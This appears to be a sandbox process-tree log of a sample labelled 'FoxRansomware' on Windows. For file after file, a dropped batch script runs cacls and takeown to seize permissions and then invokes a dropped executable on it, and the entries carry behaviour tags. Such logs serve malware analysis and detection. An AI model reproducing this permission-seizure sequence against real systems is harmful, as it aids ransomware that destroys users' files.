C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:3496
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:4076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:5992
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵PID:268
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:5628
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:3432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:4428
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:5824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:3984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:448
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:6104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
- Executes dropped EXE
PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:5680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "background.png" -nobanner3⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:2316
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:4328
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:5200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.12598791-a2ab-471c-a39b-75871721f3a6.1.etl""2⤵PID:2352
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.12598791-a2ab-471c-a39b-75871721f3a6.1.etl" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.12598791-a2ab-471c-a39b-75871721f3a6.1.etl"3⤵PID:6032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MoUsoCoreWorker.12598791-a2ab-471c-a39b-75871721f3a6.1.etl" -nobanner3⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MoUsoCoreWorker.12598791-a2ab-471c-a39b-75871721f3a6.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:3040
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:4304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "behavior.xml" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:6128
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:5040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:5656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:4736
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:3660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl""2⤵PID:5460
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" /E /G Admin:F /C3⤵PID:3472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl"3⤵PID:2164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" -nobanner3⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" -nobanner4⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵PID:4836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:5404
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:6104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:5948
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:5368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:2240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵
- Modifies file permissions
PID:3540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:5424
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:3696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:5200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "VdiState.xml" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "VdiState.xml" -nobanner4⤵PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:4328
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵PID:6032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:700
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:5320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵
- Modifies file permissions
PID:5908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:3040
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:5968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:5808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:5372
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:5992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:1452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:6024
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:4696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵PID:2164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ccf37397-b5bf-46d9-8c1f-bf884bcf2337.1.etl""2⤵PID:6020
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ccf37397-b5bf-46d9-8c1f-bf884bcf2337.1.etl" /E /G Admin:F /C3⤵PID:5828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ccf37397-b5bf-46d9-8c1f-bf884bcf2337.1.etl"3⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MoUsoCoreWorker.ccf37397-b5bf-46d9-8c1f-bf884bcf2337.1.etl" -nobanner3⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MoUsoCoreWorker.ccf37397-b5bf-46d9-8c1f-bf884bcf2337.1.etl" -nobanner4⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:4084
-
